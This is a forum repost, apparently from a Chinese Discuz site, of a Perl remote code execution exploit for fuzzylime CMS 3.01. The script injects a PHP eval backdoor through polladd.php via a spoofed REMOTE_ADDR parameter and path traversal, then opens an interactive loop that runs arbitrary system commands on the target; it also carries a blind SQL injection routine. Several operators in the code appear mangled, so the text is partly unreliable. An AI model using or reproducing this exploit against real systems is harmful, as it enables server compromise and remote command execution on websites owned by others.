• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

    发布者: 荣9319 | 发布时间: 2025-6-28 22:48| 查看数: 102| 评论数: 0|帖子模式

    #!/usr/bin/perl
    #!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!
    #after i noticed that there was a problem changing $cmd,i fixed it.this is the result.
    ##
    ## Fuzzylime 3.01 Remote Code Execution
    ## Credits: real and inphex
    ##
    ## [C:\]# perl ye.pl host /path/
    ## :>id
    ## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)
    ##

    use LWP::UserAgent;
    use HTTP::Cookies;
    use Switch;


    $host_ = "http://".shift;
    $path_ = shift;
    $info{'info'} = {
    "description" => ["#################################################\nFuzzyLime Remote Code Execution\n#################################################\nreal & inphex\n"],
    "options" =>
    {
    "agent" => "",  
    "proxy" => "",  
    "default_headers" => [  
    ["key","value"]],
    "timeout" => 2,
    "cookie" =>     
    {
    "cookie" => [""],
    },
    },
    "sending_options" =>
    {
    "host" => $host_,
    "path" => $path_."code/polladd.php",  
        "port" => 80,                  
    "method_a" => "REMOTE_CODE_EXECUTION",  
    "attack" =>
    {
        "poll" => ["get","poll","....//swear"],
    "log" => ["get","log","1"],
    "_SERVER[REMOTE_ADDR]" => ["get","_SERVER[REMOTE_ADDR]","\";eval(\"\$_POST[cmd]\"); ?>"],
    },
    },

    };

    &start($info{'info'},222);

    while () {
    print ":>";
    $cmd = <STDIN>;
    chomp($cmd);
    $info1{'info1'} = { "options" =>{"agent" => "",  "proxy" => "",  "default_headers" => [  ["key","value"]], "timeout" => 2, "cookie" =>     {"cookie" => [""],},},"sending_options" =>{"host" => $host_, "path" => $path_."code/polls/swear.inc.php",  "port" => 80,                  "method_a" => "REMOTE_CODE_EXECUTION",  "attack" =>{
        "cmd" => ["post","cmd","system('".$cmd."');"],},},};
    &start($info1{'info1'},221);
    print ${$info1{'info1'}}{221}{'content'};
    }


    sub start
    {

    $a_ = shift;
    $id = shift;
    $post_dA = "";
    $get_dA = get_d_p_s("get");
    $post_dA = get_d_p_s("post");

    my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
        $jj = 1;
    $ii = 48;
        $hh = 1;
    $ppp = 0;
    $s = shift;
    $a = "";
    $res_p = "";
    $h = "";
    $ua= "";
    $agent= "";
    $k= "";
    $v= "";
    $get_data= "";
    $post_data= "";
    $header_dA = "";
    $h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};
    $h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};
    $h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};
    $method_m = $a_->{'sending_options'}{'method_a'};
    $ua = LWP::UserAgent->new;
    $ua->timeout($a_->{'options'}{'timeout'});  
    if ($a_->{'options'}{'proxy'}) {
        $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
    }
    $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
    $ua->agent($agent);
    {                                                
    while (($k,$v) = each(%{$a_}))
    {
    if ($k ne "options" && $k ne "sending_options")
    {
    foreach $r (@{$a_->{$k}})
    {
    print $a_->{$k}[0];
    }
    }
    }


    foreach $j (@{$a_->{'options'}{'default_headers'}})
    {   
    $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
    $m  ;
    }

    if ($a_->{'options'}{'cookie'}{'cookie'}[0])
    {         
    $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
    }



    }
    switch ($method_m)        
    {
    case "attack" { &attack();}
    case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
    case "REMOTE_COMMAND_EXECUTION" { &attack();}
    case "REMOTE_CODE_EXECUTION" {&attack();}
    case "REMOTE_FILE_INCLUSION" { &attack();}
    case "LOCAL_FILE_INCLUSION" { &attack(); }
    else { &attack(); }  

    }


    sub attack
    {
    my ($jj);
    my ($h);
    my($x);
    if ($post_dA eq "") {
    $method = "get";
    } elsif ($post_dA ne "")
    {
    $method = "post";
    }
    if ($method eq "get") {  
    $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
    ${$a_}{$id}{'content'} = $res_p;
    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    if (${$jj} ne "")
    {
    ${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
    $x  ;
    }
    $jj  ;
    }

    $h  ;
    }
    } elsif ($method eq "post")
    {
    $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);

    ${$a_}{$id}{'content'} = $res_p;

    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    if (${$jj} ne "")
    {
    ${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
    $x  ;
    }
    $jj  ;
    }
    $h  ;
    }
    }

    }
    sub sql_injection_blind
    {
    while ()
    {
    while ($ii <= 120)
    {

    $itsx = "[".chr($ii)."]";
    $l = length($itsx);
    $b = ("\b")x$l;
    syswrite STDOUT,$b.$itsx;

    if(check($ii,$hh) == 1)
    {
    syswrite STDOUT,$b.chr($ii)."---";
    $hh  ;
    $chr = $chr.chr($ii);
    }
    $ii  ;
    }
    push(@ffs,length($chr));
    if (($#ffs - 999) == $ffs)
    {
    exit;
    }
    $ii = 48;
    }
    }
    sub check($$)
    {
    my ($h);
    my ($a);
    $ii = shift;
    $hh = shift;

    if (get_d_p_s("post") ne "")
    {
    $method = "post";
    } else { $method = "get";}
    if ($method eq "get")
    {
    $ppp  ;
    $query = modify($get_dA,$ii,$hh);
    $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);

    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
    return 1;
    } else { return 0;}
    }
    else
    {
    if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
    return 0;
    }else { return 1;}


    }
    $h  ;
    }
    } elsif ($method eq "post")
    {
    $ppp  ;
    $query_g = modify($get_dA,$ii,$hh);
    $query_p = modify($post_dA,$ii,$hh);

    $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    return 1;
    }
    else
    {
    return 0;
    }
    $h  ;
    }
    }
    }
        sub modify($$$)
    {
        $string = shift;
        $replace_by = shift;
        $replace_by1 = shift;

        if ($string !~/\$i/ && $string !~/\$h/) {
        return $string;
            } elsif ($string !~/\$i/)
    {
            $ff = substr($string,0,index($string,"\$h"));
                $ee =  substr($string,rindex($string,"\$h") 2);
                $string = $ff.$replace_by1.$ee;

                return $string;
    } elsif ($string !~/\$h/)
    {
            $f = substr($string,0,index($string,"\$i"));
            $e = substr($string,rindex($string,"\$i") 2);
            $string = $f.$replace_by.$e;
        return $string;
    } else
    {
        $f = substr($string,0,index($string,"\$i"));
            $e = substr($string,rindex($string,"\$i") 2);
            $string = $f.$replace_by.$e;

        $ff = substr($string,0,index($string,"\$h"));
            $ee =  substr($string,rindex($string,"\$h") 2);
            $string = $ff.$replace_by1.$ee;

        return $string;
    }
    }
    sub get_d_p_s
    {
    $k = 0;
    $v = 0;
    $g_d_p_s = shift;

    @post = ();
    @get = ();

    $post_data = "";
    $get_data = "";
    $header_data = "";
    %header_dA = ();
    $p = "";
    $g = "";
    while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
    {
    if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)
    {
    $p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
    } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {
    $g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
    } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
    {
            $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
    }
    }
    if ($g_d_p_s eq "get")
    {
    return $g;
    }
    elsif ($g_d_p_s eq "post")
    {
    return $p;
    } elsif ($g_d_p_s eq "header")
    {
    return %header_dA;
    }

    @a_ = ();
    }
    sub get_data
    {
    $h_host_h_xdsjaop = shift;
    $h_path_h_xdsjaop = shift;
    %hash = get_d_p_s("header");
        while (($u,$c) = each(%hash))
    {
    $ua->default_headers->push_header($u => $c);
    }
    $req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
    return $req->content;
    }
    sub post_data
    {
    $h_host_h_xdsjaop = shift;
    $h_path_h_xdsjaop = shift;
    $content_type = shift;
    $send = shift;
    %hash = get_d_p_s("header");
        while (($u,$c) = each(%hash))
    {
        $ua->default_headers->push_header($u => $c);
    }
    $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
    $req->content_type($content_type);
    $req->content($send);
    $res = $ua->request($req);
    return $res->content;
    }

    }

    来源:https://www.jb51.net/hack/5664.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表